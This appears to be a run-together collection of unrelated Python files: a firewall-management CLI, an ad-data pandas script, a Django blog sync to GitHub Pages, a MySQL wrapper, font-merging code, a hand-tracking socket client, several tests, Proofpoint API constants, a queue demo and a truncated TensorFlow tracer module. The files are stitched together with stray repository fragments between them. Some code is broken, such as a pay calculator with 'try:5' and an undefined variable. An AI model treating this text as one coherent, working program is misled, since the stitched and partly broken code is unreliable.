@arg("-f", "--file", dest="smcrc", help="provide login info in given file (same format as ~/.smcrc)") @arg("-a", "--auto", help="login using ~/.smcrc)") @named("login") def cmd_login(server, secure=False, port=None, api_key=None, version=None, ca_cert=None, smcrc=None, auto=False): """ login to the smc (rest api) If a file is specified using '-f' or --file, it must have the following format: [smc] smc_address=192.168.100.7 smc_apikey=xxxx api_version=6.4 smc_port=8082 smc_ssl=False verify_ssl=False ssl_cert_file='' """ #todo tls if not server and not smcrc and not auto: raise CommandError("Must have either --file or or --auto") if int(server is not None)+int(smcrc is not None)+int(auto) > 1: raise CommandError("Cannot have both and/or --file and/or --auto") if server and not api_key: raise CommandError("missing --api-key") proto = "https" if secure else "http" url = "{proto}://{host}:{port}".format(host=server, port=port, proto=proto) \ if server else None verify = ca_cert or False sess = SMCSession() try: sess.login(url=url, api_key=api_key, verify=verify, api_version = version, alt_filepath=smcrc) #todo save to another place (env var) if not save_session(sess): print_err("Failed to save session") return "login successful" except SMCConnectionError as conn_error: logger.exception(conn_error) raise CommandError( "connection to '{}:{}' failed\n({})".format(server, port, conn_error)) @named("logout") def cmd_logout(): """ logout from the smc """ session_file_path = get_session_file_path() if os.path.isfile(session_file_path): sess = load_session(session_file_path) sess.logout() os.remove(session_file_path) @named("push") @arg("-p", "--policy", dest="policy", required=True) def cmd_push(hname, policy=None): session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: res = smc_client.execute(hname, operation="upload", params={'filter': policy}) xml = etree.XML(str(res)) follower = xml.findtext("follower") print(follower) while True: res2= smc_client.get(follower) print(res2) print(time.sleep(2)) except Exception as exc: raise CommandError(exc) @named("list") @arg("hname", nargs='?', default=None) def cmd_list(hname, json=False, xml=False, links=False): """ list the sub-element under given hierarchical name (hname) """ session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: res = smc_client.list(hname) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) for name in sorted(res): print_fmt("{}", name) @named("del") def cmd_del(hname): """ delete an element with its hierarchical name (hname) """ #todo error session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: smc_elt = smc_client.get(hname) smc_client.delete(smc_elt) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) @named("apply") @arg("filename") @arg("-p", "--print", dest="print_only", help="print the payload of the smc-api request") @arg("-pp", "--preprocess", dest="preprocess_only", help="print the payload of the smc-api request") @arg("-v", '--var', dest='key_values', action='append', help="assign a variable (e.g. -v my_ip=10.1.1.1)", default=[], type=str) @arg("-vf", '--var-file', dest='variable_files', action='append', help="read variables from a file", default=[], type=str) @arg("-i", '--ignore-errors', dest='ignore_errors', help="continue script execution on error") @arg("-d", '--delete', dest='delete_mode', help="delete all the resources defined in the file") @arg("-c", '--cleanup', dest='cleanup_mode', help="delete all the resources before applying the config") def cmd_apply(filename, print_only=False, preprocess_only=False, key_values=None, ignore_errors=False, delete_mode=False, cleanup_mode=False, variable_files=None): """ execute a script file. """ temp_file = None variables = {} for kv in key_values: (k, v) = kv.split("=") variables[k] = v session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) if filename=="-": content = sys.stdin.read() tf = tempfile.NamedTemporaryFile(suffix=".cnf", delete=False) tf.write(content.encode("utf-8")) tf.close() temp_file = tf.name filename = temp_file try: run_script(smc_client, filename, print_only, preprocess_only, variables, variable_files, ignore_errors, delete_mode, cleanup_mode) except (IOError) as err: raise CommandError(err) except (TemplateLookupException, SyntaxException, NameError) as err: raise CommandError(u"(Preprocessing): " + unicode(err)) except (etconfig.ElementConfError) as err: raise CommandError(u"(Parsing): " + unicode(err)) except (RunScriptError) as err: raise CommandError(u"(ScriptExec): " + unicode(err)) except (InvalidSessionError) as err: raise CommandError(u"(Session): " + unicode(err)) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) if temp_file: os.remove(temp_file) @named("convert") @arg("filename") @arg("-f", "--format", choices=["json", "yaml", "xml"], default="yaml", dest="fmt") def cmd_convert(filename, fmt=None): """ convert file format (to cnf, yaml or xml) """ mylookup = TemplateLookup(directories=["."]) tmpl = Template(filename=filename, lookup=mylookup) rendered = tmpl.render() elt = etconfig.loads(rendered, single_root_node=False, id_mapper=etconfig.id2attr("name")) is_xml = (fmt == "xml") is_yaml = (fmt == "yaml") is_json = (fmt == "json") if is_xml: xml = etree.tostring(elt, encoding='utf8', pretty_print=True) print(xml) elif is_yaml: struct = etconfig.utils.el_to_struct(elt, False) print(yaml.dump(struct)) elif is_json: # todo pass @named("get") # @arg("-l", "--links", dest="links", action="store_const", const=True) @arg("-f", "--format", choices=["yaml", "xml", "conf"], default="conf", dest="fmt") def cmd_get(hname, fmt=None): """retrieve an smc element with its hierarchical name (hname) and display it. """ is_xml = (fmt == "xml") is_yaml = (fmt == "yaml") is_conf = (fmt == "conf") #todo error session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: smc_element = smc_client.get(hname) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) elt = smc_element.data if is_xml: xml = etree.tostring(elt, encoding='utf8', pretty_print=True) print_fmt(xml) elif is_conf: conf = etconfig.dumps(elt, print_root=True) print_fmt(conf) elif is_yaml: struct = etconfig.utils.el_to_struct(elt) print(yaml.dump(struct)) @named("hname") def cmd_show_hname(hname): """ convert a hierarchical name (hname) into the corresponding url """ session_file_path = get_session_file_path() smc_client = SMCClient(session_file_path) try: url = resolve_hname(smc_client.rest_client, hname) except ResolveError as err: raise CommandError(err) except (SMCOperationFailure) as err: raise CommandError(u"(SMC): " + unicode(err)) print_fmt(url) cmd_list = [cmd_login, cmd_logout, cmd_list, cmd_apply, cmd_del, cmd_get, cmd_show_hname, cmd_convert, cmd_push] # -*- coding: utf-8 -*- """ @file:make_option_type_feature.py @time:2019/6/9 9:09 @author:Tangj @software:Pycharm @Desc """ import pandas as pd import numpy as np ''' 先给trian集中加入charge_type和'target_type',然后把训练集按照aid进行groupby操作, 取出aid,然后将对该广告的操作数据取出来,然后按照changetime进行排序, 然后对于大于等于请求日期之后的就将其归为该条操作数据的类型 这样也不用去管对应的是新建操作还是修改操作了,反正修改肯定是在新建之后的操作。 ''' train = pd.read_csv('../usingData/train/metafea_train.csv') operate = pd.read_csv('../usingData/train/train_bid.csv') print(operate) def f(x): xx = str(x) tt = xx[0:8] t = int(tt) return t changeTime = operate['changeTime'].values new_time = list(map(f, changeTime)) operate['changeDay'] = new_time new = operate.groupby('ad_id') print(operate.columns) # ['ad_id', 'changeTime', 'operateType', 'target_type', 'charge_type', # 'bid', 'changeDay'] # for i in new: # ii = i[1] # num = len(ii['charge_type'].unique()) # if num != 1: # print(num) # print(ii[['ad_id', 'changeTime', 'charge_type', 'operateType','changeDay']]) # print(ii[['changeDay','charge_type']]) # opstatus.index = opstatus['statime'] # opstatus.sort_index() train['charge_type'] = -1 train['target_type'] = -1 group = train.groupby('ad_id') new_train = pd.DataFrame() for g in group: ads = g[1] aid = ads['ad_id'].values[0] op = operate[operate['ad_id'] == aid] op.index = op['changeTime'] op.sort_index() targe_type = op['target_type'].values charge_type = op['charge_type'].values changeDay = op['changeDay'].values for i, item in enumerate(changeDay): mask = ads['day'] >= item print(item) ads.loc[mask, 'charge_type'] = targe_type[i] ads.loc[mask, 'target_type'] = targe_type[i] print(ads) new_train = pd.concat([new_train, ads]) new_train.to_csv('add_op_train.csv', index=False)100-1000 import logging import os from django.conf import settings from django.template import Template, Context from git import Repo from utils.mistune_markdown import article_markdown # from markdown import markdown logger = logging.getLogger('debug') class SyncGit: """ Git上传, 需要有对应setting里的项目目录, 且可以经过ssh上传github """ def __init__(self): self.repo = Repo(settings.GITHUB_PAGE_DIR) def sync(self, add_all=True, commit='add post', name='origin'): """ 同步文章到github page的仓库 """ if not settings.GITHUB_PAGE: return False, 'Do not enable GITHUB_PAGE' try: self.add(add_all) self.commit(commit) self.push(name) return True, 'Github page synced Successful' except Exception as e: logging.error(str(e)) return False, str(e) def add(self, add_all=True): self.repo.git.add(A=add_all) def commit(self, commit): self.repo.index.commit(commit) def push(self, name='origin'): self.repo.remote(name=name).push() template = """ {{ title }}

{{ h1_title }}

{{ motto }}

{% if display_title %}

{{ title }}

{% endif %} {% if content %} {{ content|safe }} {% endif %} {% if article_list %}
{% regroup article_list by add_time.year as year_list %}
    {% for year in year_list %}
  • {{ year.grouper }} 年 {% regroup year.list by add_time.month as month_list %}
      {% for month in month_list %}
    • {{ month.grouper }} 月
    • {% endfor %}
  • {% endfor %}
{% endif %}
""" class HtmlRender: def __init__(self): self.blog_dir = settings.GITHUB_PAGE_DIR def index(self, blog_setting, article_list, link_list): """ 渲染首页的HTML, 也就是文章归档页 :param blog_setting 一些配置项 :param article_list 文章列表(需要按照时间有序) :param link_list 友情链接列表 """ if not settings.GITHUB_PAGE: return False, 'Do not enable GITHUB_PAGE' try: context = Context({ "title": blog_setting.name, "content": "文章归档页", "description": blog_setting.desc, "github_user": blog_setting.github_user, "github_avatar": blog_setting.github_avatar, "about_me": blog_setting.about_me, "article_list": article_list, "link_list": link_list, "h1_title": blog_setting.title, "motto": blog_setting.motto, }) with open(self.blog_dir + '/index.html', 'w', encoding='utf8') as ff: ff.write(Template(template).render(context)) return SyncGit().sync() except Exception as e: return False, str(e) def detail(self, blog_setting, article): """ 渲染文章详情页的HTML, FIXME: 更好的markdown渲染效果 :param blog_setting 一些配置项 :param article 文章 """ if not settings.GITHUB_PAGE: return False, 'Do not enable GITHUB_PAGE' if not article: return False, f'No match article: {article}' try: # 判断分类目录是否存在, 不存在则创建 if not os.path.isdir(self.blog_dir + '/' + article.category.name.strip()): os.mkdir(self.blog_dir + '/' + article.category.name.strip()) context = Context({ "display_title": True, "title": article.title, "description": article.title, "content": article_markdown(article.content), "github_user": blog_setting.github_user, "github_avatar": blog_setting.github_avatar, "about_me": blog_setting.about_me, # "category_tree": article.get_category_tree(), # "author": article.author, # "content": markdown(article.content, extensions=['extra', 'codehilite', 'tables', 'toc']) "h1_title": blog_setting.title, "motto": blog_setting.motto, }) file = self.blog_dir + '/' + article.category.name.strip() + '/' + article.title.strip() + '.html' with open(file, 'w', encoding='utf8') as f: return True, f.write(Template(template).render(context)) except Exception as e: return False, str(e) trentwangmeng/test0 #encoding=utf-8 # ============================== # MySQL封装 # ============================== import MySQLdb class mysqlPack: def __init__(self,conn=None): if conn == None: self.conn = MySQLdb.connect( host='172.16.17.32', user='hehe', port=3306, passwd='', db='yjyx', charset='utf8' ) else: self.conn = conn self.c=self.conn.cursor() #发送mysql命令 def send_mysql_command(self,str): self.c.execute(str) #读取一行 def read_mysql_oneline(self): return self.c.fetchone #读取全部行 def read_mysql_allline(self): return self.c.fetchall() #输出列表 def get_mysql_list(self): for i in range(self.c.rowcount): print(self.c.fetchone()) if __name__ == '__main__': passfrom fontFeatures import FontFeatures, Routine, Substitution from fontFeatures.feaLib import FeaParser from pathlib import Path import logging logger = logging.getLogger("ufomerge") logging.basicConfig(level=logging.INFO) def merge_ufos( ufo1, ufo2, glyphs=None, exclude_glyphs=None, codepoints=None, layout_handling="subset", existing_handling="replace", ): if glyphs is None: glyphs = [] glyphs = set(glyphs) if codepoints: cp2glyph = {} for g in ufo2: for u in g.unicodes: cp2glyph[u] = g.name glyphs |= set(cp2glyph[c] for c in codepoints if c in cp2glyph) if exclude_glyphs: glyphs = set(glyphs) - set(exclude_glyphs) # Check those glyphs actually are in UFO 2 not_there = glyphs - set(ufo2.keys()) if len(not_there): logger.warn("The following glyphs were not in UFO 2: %s" % ", ".join(not_there)) glyphs = glyphs - not_there if not glyphs: logger.info("No glyphs selected, nothing to do") exit(0) newglyphset = set(ufo1.keys()) | set(glyphs) # Handle layout subsetting here, in case closure is needed new_layout_rules = FontFeatures() if layout_handling == "ignore": pass else: path = getattr(ufo2, "_path", None) includeDir = Path(ufo2._path).parent if path else None ff = FeaParser(ufo2.features.text, includeDir=includeDir).parse() for routine in ff.routines: newroutine = Routine(name=routine.name, flags=routine.flags) for rule in routine.rules: if not isinstance(rule, Substitution): continue flat_outputs = [ item for sublist in rule.replacement for item in sublist ] true_inputs = [list(set(r) & newglyphset) for r in rule.input] rule.precontext = [list(set(r) & newglyphset) for r in rule.precontext] rule.postcontext = [ list(set(r) & newglyphset) for r in rule.postcontext ] if ( any(not g for g in true_inputs) or any(not g for g in rule.precontext) or any(not g for g in rule.postcontext) ): continue if layout_handling == "closure": # Any glyphs from "glyphs" substituted or generated by rules need to be added to the glyph set if not any(g in glyphs for g in rule.involved_glyphs): continue rule.input = true_inputs glyphs |= set(flat_outputs) else: # Any rules with new glyphs on the right hand side and glyphs # we have on the left hand side need to be copied into UFO1 if not any(g in glyphs for g in flat_outputs): continue if len(rule.input) == 1 and len(rule.replacement) == 1: # GSUB1 mapping = zip(rule.input[0], rule.replacement[0]) mapping = [(a,b) for a,b in mapping if a in newglyphset and b in newglyphset] if not mapping: continue rule.input[0] = [r[0] for r in mapping] rule.replacement[0] = [r[1] for r in mapping] else: rule.input = true_inputs rule.replacement = [list(set(r) & newglyphset) for r in rule.replacement] logging.debug("Adding rule '%s'", rule.asFea()) newroutine.rules.append(rule) if newroutine.rules: # Was it in a feature? add_to = [] for feature_name, routines in ff.features.items(): for routine_ref in routines: if routine_ref.routine == routine: add_to.append(feature_name) for feature_name in add_to: new_layout_rules.addFeature(feature_name, [newroutine]) # Kerning!! # # Create a list of flat kerning pairs for UFO 1 # ufo1_kerns = set() # for l,r in ufo1.kerning.keys(): # l = ufo1.groups.get(l,[l]) # r = ufo1.groups.get(r,[r]) # for lg in l: # for rg in r: # ufo1_kerns.add((lg,rg)) # Slim down the groups to only those in the glyph set for g in ufo2.groups.keys(): ufo2.groups[g] = [g for g in ufo2.groups[g] if g in glyphs] for (l, r), value in ufo2.kerning.items(): lg = ufo2.groups.get(l, [l]) rg = ufo2.groups.get(r, [r]) if not lg or not rg: continue if any(lglyph not in newglyphset for lglyph in lg) or any( rglyph not in newglyphset for rglyph in rg ): continue # Just add for now. We should get fancy later ufo1.kerning[(l, r)] = value if l.startswith("public.kern"): if l not in ufo1.groups: ufo1.groups[l] = ufo2.groups[l] else: ufo1.groups[l] = list(set(ufo1.groups[l] + ufo2.groups[l])) if r.startswith("public.kern"): if r not in ufo1.groups: ufo1.groups[r] = ufo2.groups[r] else: ufo1.groups[r] = list(set(ufo1.groups[r] + ufo2.groups[r])) # Routines for merging font lib keys def merge_set(ufo1, ufo2, name, g, create_if_not_in_ufo1=False): if name not in ufo2.lib or g not in ufo2.lib[name]: return if name not in ufo1.lib: if create_if_not_in_ufo1: ufo1.lib[name] = [] else: return if g not in ufo1.lib[name]: ufo1.lib[name].append(g) def merge_dict(ufo1, ufo2, name, g, create_if_not_in_ufo1=False): if name not in ufo2.lib or g not in ufo2.lib[name]: return if name not in ufo1.lib: if create_if_not_in_ufo1: ufo1.lib[name] = {} else: return ufo1.lib[name][g] = ufo2.lib[name][g] # Check the glyphs for components def close_components(glyphs, g): if not ufo2[g].components: return for comp in ufo2[g].components: if comp.baseGlyph not in newglyphset: # Well, this is the easy case glyphs.add(comp.baseGlyph) close_components(glyphs, comp.baseGlyph) elif existing_handling == "replace": # Also not a problem glyphs.add(comp.baseGlyph) close_components(glyphs, comp.baseGlyph) elif comp.baseGlyph in ufo1: # Oh bother. logger.warning( f"New glyph {g} used component {comp.baseGlyph} which already exists in font; not replacing it, as you have not specified --replace-existing" ) for g in list(glyphs): # list() avoids "Set changed size during iteration" error close_components(glyphs, g) # Now do the add for g in glyphs: if existing_handling == "skip" and g in ufo1: logger.info("Skipping glyph '%s' already present in target file" % g) continue merge_set(ufo1, ufo2, "public.glyphOrder", g, create_if_not_in_ufo1=False) merge_set(ufo1, ufo2, "public.skipExportGlyphs", g, create_if_not_in_ufo1=True) merge_dict(ufo1, ufo2, "public.postscriptNames", g, create_if_not_in_ufo1=True) merge_dict( ufo1, ufo2, "public.openTypeCategories", g, create_if_not_in_ufo1=True ) if g in ufo1: ufo1[g] = ufo2[g] else: ufo1.addGlyph(ufo2[g]) if new_layout_rules.routines: ufo1.features.text += new_layout_rules.asFea(do_gdef=False) import cv2 import socket from time import sleep from handController import HandTrackingModule as htm def sendSocket(status): HOST = "192.168.1.78" # Esp Internal IP PORT = 9999 # Port Used with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((HOST, PORT)) if status == True: s.sendall(b'1') sleep(0.05) if status == False: s.sendall(b'0') sleep(0.05) def startHandTracking(): wCam, hCam = 640, 480 cap = cv2.VideoCapture(0) cap.set(3, wCam) cap.set(4, hCam) detector = htm.handDetector(detectionCon=0.75) status = False while True: success, img = cap.read() img = detector.findHands(img, draw = False) tipsIDs = [8, 12, 16, 20] firstTime = True lmList = detector.findPosition(img, draw = False) if len(lmList) != 0: fingers = [] for id in range(0, 4): if lmList[tipsIDs[id]][2] < lmList[tipsIDs[id] - 2][2]: fingers.append(1) else: fingers.append(0) totalFingers = fingers.count(1) if totalFingers == 4 and status == True: print("Enviar Request de Desligar") sendSocket(status) status = False elif totalFingers == 0 and status == False: print("Enviar Request para Ligar") sendSocket(status) status = True else: pass #sleep(1) cv2.imshow("Image", img) cv2.waitKey(1) def main(): startHandTracking() if __name__ == "__main__": main() #Project by rafawastaken # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections from google.protobuf import descriptor_pb2 from gapic.schema import wrappers def test_signature_dispatch_field(): T = descriptor_pb2.FieldDescriptorProto.Type fields = collections.OrderedDict(( ('foo', make_field(name='foo', type=T.Value('TYPE_INT32'))), ('bar', make_field(name='bar', type=T.Value('TYPE_BOOL'))), )) signature = wrappers.MethodSignature(name='spam', fields=fields) assert signature.dispatch_field == fields['foo'] def test_signatures_magic_methods(): T = descriptor_pb2.FieldDescriptorProto.Type fields = collections.OrderedDict(( ('foo', make_field(name='foo', type=T.Value('TYPE_INT32'))), ('bar', make_field(name='bar', type=T.Value('TYPE_BOOL'))), )) signatures = wrappers.MethodSignatures(all=( wrappers.MethodSignature(name='spam', fields=fields), wrappers.MethodSignature(name='eggs', fields={ 'foo': fields['foo'], }), )) assert len(signatures) == 2 assert tuple([i for i in signatures]) == signatures.all assert signatures[0] == signatures.all[0] def test_signatures_single_dispatch(): T = descriptor_pb2.FieldDescriptorProto.Type fields = ( ('foo', make_field( message=wrappers.MessageType( fields={}, message_pb=descriptor_pb2.DescriptorProto(name='Bacon'), ), name='bar', type=T.Value('TYPE_MESSAGE'), type_name='bogus.Message', )), ('bar', make_field(name='foo', type=T.Value('TYPE_INT32'))), ) signatures = wrappers.MethodSignatures(all=( wrappers.MethodSignature( name='spam', fields=collections.OrderedDict(fields), ), wrappers.MethodSignature( name='eggs', fields=collections.OrderedDict(reversed(fields)), ), )) assert len(signatures) == 2 assert len(signatures.single_dispatch) == 1 assert signatures.single_dispatch[0] == signatures[1] def make_field(*, message=None, enum=None, **kwargs) -> wrappers.Field: kwargs.setdefault('name', 'my_field') kwargs.setdefault('number', 1) kwargs.setdefault('type', descriptor_pb2.FieldDescriptorProto.Type.Value('TYPE_BOOL'), ) field_pb = descriptor_pb2.FieldDescriptorProto(**kwargs) return wrappers.Field(field_pb=field_pb, message=message, enum=enum) Jette16/spacy-course def test(): import spacy.matcher assert isinstance( matcher, spacy.matcher.Matcher ), "Você está inicializando o Comparador corretamente?" assert ( "Matcher(nlp.vocab)" in __solution__ ), "Você está inicializando o Comparador corretamente com o vocabulário compartilhado?" assert ( len(pattern) == 2 ), "A expressão deve descrever dois tokens (dois dicionários)." assert isinstance(pattern[0], dict) and isinstance( pattern[1], dict ), "Cada item da expressão deve conter um dicionário." assert ( len(pattern[0]) == 1 and len(pattern[1]) == 1 ), "Cada item na expressão deve conter apenas uma chave." assert any( pattern[0].get(key) == "iPhone" for key in ["text", "TEXT"] ), "Você está fazendo a comparação com o texto do token?" assert any( pattern[1].get(key) == "X" for key in ["text", "TEXT"] ), "Você está fazendo a comparação com o texto do token?" assert ( 'matcher.add("IPHONE_X_PATTERN"' in __solution__ ), "Você está adicionando a expressão corretamente?" assert ( "matches = matcher(doc)" in __solution__ ), "Você está chamando o Comparador passando o doc como parâmetro?" __msg__.good( "Parabéns! Você identificou uma correspondência com sucesso: dois tokens " "em doc[1:3] que correspondem a partição 'iPhone X'. " ) # File: proofpoint_consts.py # Copyright (c) 2017-2020 Splunk Inc. # # Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) # PP_API_BASE_URL = "https://tap-api-v2.proofpoint.com" PP_API_PATH_CLICKS_BLOCKED = "/v2/siem/clicks/blocked" PP_API_PATH_CLICKS_PERMITTED = "/v2/siem/clicks/permitted" PP_API_PATH_MESSAGES_BLOCKED = "/v2/siem/messages/blocked" PP_API_PATH_MESSAGES_DELIVERED = "/v2/siem/messages/delivered" PP_API_PATH_ISSUES = "/v2/siem/issues" PP_API_PATH_ALL = "/v2/siem/all" PP_API_PATH_CAMPAIGN = "/v2/campaign/{}" PP_API_PATH_FORENSICS = "/v2/forensics" PP_API_PATH_DECODE = "/v2/url/decode" # Constants relating to 'get_error_message_from_exception' ERR_CODE_MSG = "Error code unavailable" ERR_MSG_UNAVAILABLE = "Error message unavailable. Please check the asset configuration and|or action parameters" PARSE_ERR_MSG = "Unable to parse the error message. Please check the asset configuration and|or action parameters" TYPE_ERR_MSG = "Error occurred while connecting to the Proofpoint TAP Server. Please check the asset configuration and|or action parameters." ERR_MSG_FORMAT_WITH_CODE = "Error Code: {}. Error Message: {}" ERR_MSG_FORMAT_WITHOUT_CODE = "Error Message: {}" # Constants relating to 'validate_integer' INVALID_INTEGER_ERR_MSG = "Please provide a valid integer value in the {}" INVALID_NON_NEGATIVE_INTEGER_ERR_MSG = "Please provide a valid non-negative integer value in the {}" INITIAL_INGESTION_WINDOW_KEY = "'initial_ingestion_window' configuration parameter" # Constant relating to 'handle_py_ver_compat_for_input_str' PY_2TO3_ERR_MSG = "Error occurred while handling python 2to3 compatibility for the input string" # Constant relating to fetching the python major version ERR_FETCHING_PYTHON_VERSION = "Error occurred while fetching the Phantom server's Python major version" # Constants relating to error messages while processing response from server EMPTY_RESPONSE_MSG = "Status code: {}. Empty response and no information in the header" HTML_RESPONSE_PARSE_ERR_MSG = "Cannot parse error details" JSON_PARSE_ERR_MSG = 'Unable to parse JSON response. Error: {}' SERVER_ERR_MSG = 'Error from server. Status Code: {} Data from server: {}' SERVER_ERR_CANT_PROCESS_RESPONSE_MSG = "Can't process response from server. Status Code: {} Data from server: {}" CONNECTION_REFUSED_ERR_MSG = "Error Details: Connection Refused from the Server" SERVER_CONNECTION_ERR_MSG = "Error Connecting to server. Details: {}" def computepay(hours,rate): if hours>40: new_rate= 1.5 * hourly_rate gross_pay=hours * new_rate else: gross_pay= hours * hourly_rate print("pay is:", gross_pay) try:5 hours = int(input("enter hours worked")) hourly_rate = float(input("enter the rate")) except: print("enter numeric input") exit()""" @author: acfromspace """ class Queue: def __init__(self): self.items = [] def is_empty(self): return print("is_empty():", self.items == []) def enqueue(self, item): print("enqueue():", item) self.items.insert(0, item) def dequeue(self): return print("dequeue():", self.items.pop()) def size(self): return print("size():", len(self.items)) def showcase(self): return print("showcase():", self.items) queue = Queue() queue.is_empty() queue.showcase() queue.enqueue('hello') queue.showcase() queue.enqueue('dog') queue.showcase() queue.enqueue(5) queue.showcase() queue.size() queue.showcase() queue.dequeue() queue.showcase() """ Output: is_empty(): True showcase(): [] enqueue(): hello showcase(): ['hello'] enqueue(): dog showcase(): ['dog', 'hello'] enqueue(): 5 showcase(): [5, 'dog', 'hello'] size(): 3 showcase(): [5, 'dog', 'hello'] dequeue(): hello showcase(): [5, 'dog'] """ 10-100 # Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ======================================================================== """Tensor Tracer report generation utilities.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import os from tensorflow.python.platform import gfile from tensorflow.python.platform import tf_logging as logging from tensorflow.python.tpu import tensor_tracer_pb2 _TRACER_LOG_PREFIX = ' [>>>TT>>>]' _MARKER_SECTION_BEGIN = '!!!!!!! section-begin:' _MARKER_SECTION_END = '!!!!!!! section-end:' _SECTION_NAME_CONFIG = 'configuration' _SECTION_NAME_REASON = 'reason' _SECTION_NAME_OP_LIST = 'op-list' _SECTION_NAME_TENSOR_LIST = 'tensor-list' _SECTION_NAME_CACHE_INDEX_MAP = 'cache-index-map' _SECTION_NAME_GRAPH = 'graph' _SECTION_NAME_TENSOR_TRACER_CHECKPOINT = 'tensor_tracer_checkpoint' _FIELD_NAME_VERSION = 'version:' _FIELD_NAME_DEVICE = 'device:' _FIELD_NAME_TRACE_MODE = 'trace-mode:' _FIELD_NAME_SUBMODE = 'submode:' _FIELD_NAME_NUM_REPLICAS = 'num-replicas:' _FIELD_NAME_NUM_REPLICAS_PER_HOST = 'num-replicas-per-host:' _FIELD_NAME_NUM_HOSTS = 'num-hosts:' _FIELD_NAME_NUM_OPS = 'number-of-ops:' _FIELD_NAME_NUM_TENSORS = 'number-of-tensors:' _FIELD_NAME_NUM_CACHE_INDICES = 'number-of-indices:' _FIELD_NAME_TOPOLOGICAL_SORT_SUCCEED = 'topological-sort-succeed:' _CURRENT_VERSION = 'use-outside-compilation' _TT_REPORT_PROTO = 'tensor_tracer_report.report_pb' def topological_sort(g): """Performs topological sort on the given graph. Args: g: the graph. Returns: A pair where the first element indicates if the topological sort succeeded (True if there is no cycle found; False if a cycle is found) and the second element is either the sorted list of nodes or the cycle of nodes found. """ def _is_loop_edge(op): """Returns true if the op is the end of a while-loop creating a cycle.""" return op.type in ['NextIteration'] def _in_op_degree(op): """Returns the number of incoming edges to the given op. The edge calculation skips the edges that come from 'NextIteration' ops. NextIteration creates a cycle in the graph. We break cycles by treating this op as 'sink' and ignoring all outgoing edges from it. Args: op: Tf.Operation Returns: the number of incoming edges. """ count = 0 for op in op.control_inputs + [in_tensor.op for in_tensor in op.inputs]: if not _is_loop_edge(op): count += 1 return count sorted_ops = [] op_in_degree = {op: _in_op_degree(op) for op in g.get_operations()} frontier = [op for (op, degree) in op_in_degree.items() if degree == 0] frontier.sort(key=lambda op: op.name) while frontier: op = frontier.pop() # Remove the op from graph, and remove its outgoing edges. sorted_ops.append(op) if _is_loop_edge(op): continue # pylint: disable=protected-access consumers = list(op._control_outputs) # pylint: enable=protected-access for out_tensor in op.outputs: consumers += [consumer_op for consumer_op in out_tensor.consumers()] consumers.sort(key=lambda op: op.name) for consumer in consumers: # For each deleted edge shift the bucket of the vertex. op_in_degree[consumer] -= 1 if op_in_degree[consumer] == 0: frontier.append(consumer) if op_in_degree[consumer] < 0: raise ValueError('consumer:%s degree mismatch'%consumer.name) left_ops = set([op for (op, degree) in op_in_degree.items() if degree > 0]) if left_ops: return (True, left_ops) else: assert len(g.get_operations()) == len(sorted_ops) return (False, sorted_ops) class TensorTracerConfig(object): """Tensor Tracer config object.""" def __init__(self): self.version = _CURRENT_VERSION self.device_type = None self.num_replicas = None self.num_replicas_per_host = None self.num_hosts = None class TensorTraceOrder(object): """Class that is responsible from storing the trace-id of the tensors.""" def __init__(self, graph_order, traced_tensors): self.graph_order = graph_order self.traced_tensors = traced_tensors self._create_tensor_maps() def _create_tensor_maps(self): """Creates tensor to cache id maps.""" self.tensorname_to_cache_idx = {} self.cache_idx_to_tensor_idx = [] for out_tensor in self.traced_tensors: tensor_name = out_tensor.name if tensor_name in self.tensorname_to_cache_idx: raise ValueError( 'Tensor name %s should not be already in ' 'tensorname_to_cache_idx'%tensor_name) if tensor_name not in self.graph_order.tensor_to_idx: raise ValueError( 'Tensor name %s is not in the tensor_to_idx'%tensor_name) tensor_idx = self.graph_order.tensor_to_idx[tensor_name] cache_idx = len(self.tensorname_to_cache_idx) self.tensorname_to_cache_idx[tensor_name] = cache_idx self.cache_idx_to_tensor_idx.append(tensor_idx) if len(self.tensorname_to_cache_idx) != len( self.cache_idx_to_tensor_idx): raise RuntimeError('len(self.tensorname_to_cache_idx) != ' 'len(self.cache_idx_to_tensor_idx') def sort_tensors_and_ops(graph): """Returns a wrapper that has consistent tensor and op orders.""" graph_wrapper = collections.namedtuple('GraphWrapper', ['graph', 'operations', 'op_to_idx', 'tensors', 'tensor_to_idx', 'contains_cycle', 'topological_order_or_cycle']) contains_cycle, topological_order_or_cycle = topological_sort(graph) if not contains_cycle: operations = topological_order_or_cycle else: operations = graph.get_operations() op_to_idx = {op.name: index for index, op in enumerate(operations)} tensors = [] for op in operations: tensors.extend(op.outputs) tensor_to_idx = {tensor.name: index for index, tensor in enumerate(tensors)} return graph_wrapper(graph=graph, operations=operations, op_to_idx=op_to_idx, tensors=tensors, tensor_to_idx=tensor_to_idx, contains_cycle=contains_cycle, topological_order_or_cycle=topological_order_or_cycle) class OpenReportFile(object): """Context manager for writing report file.""" def __init__(self, tt_parameters): if not tt_parameters.report_file_path: self._report_file = None return try: self._report_file = gfile.Open(tt_parameters.report_file_path, 